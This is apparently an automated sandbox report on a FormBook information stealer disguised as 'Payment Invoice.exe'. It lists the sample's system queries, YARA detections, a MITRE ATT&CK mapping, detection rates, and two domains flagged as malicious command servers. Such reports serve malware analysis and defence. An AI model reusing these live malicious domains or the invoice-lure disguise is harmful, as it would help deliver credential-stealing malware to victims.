Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Payment Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection812	Rootkit1	Credential API Hooking1	Query Registry1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	Input Capture1	Security Software Discovery321	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Virtualization/Sandbox Evasion31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection812	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	System Information Discovery112	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Payment Invoice.exe	33%	Virustotal		Browse
Payment Invoice.exe	29%	ReversingLabs	Win32.Trojan.Wacatac
Payment Invoice.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	29%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
14.2.Payment Invoice.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.microsoft.co4	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
www.the-techs.info/chue/	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ext-cust.squarespace.com	198.185.159.144	true	false	high
www.minterfortexas.com	unknown	unknown	true	unknown
www.the-techs.info	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.the-techs.info/chue/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.microsoft.co4	powershell.exe, 0000000B.00000003.788406161.0000000008D63000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 0000000B.00000003.788406161.0000000008D63000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
https://go.micro	powershell.exe, 0000000B.00000003.790519826.0000000005AE1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.com	explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://james.newtonking.com/projects/json	Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.newtonsoft.com/jsonschema	Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 0000000F.00000002.911585809.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Payment Invoice.exe, 00000001.00000002.720684926.0000000002A45000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.185.159.144	ext-cust.squarespace.com	United States		53831	SQUARESPACEUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385452
Start date:	12.04.2021
Start time:	14:38:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Payment Invoice.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@13/8@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.8% (good quality ratio 15%) Quality average: 72.2% Quality standard deviation: 31.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 117 Number of non-executed functions: 161
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
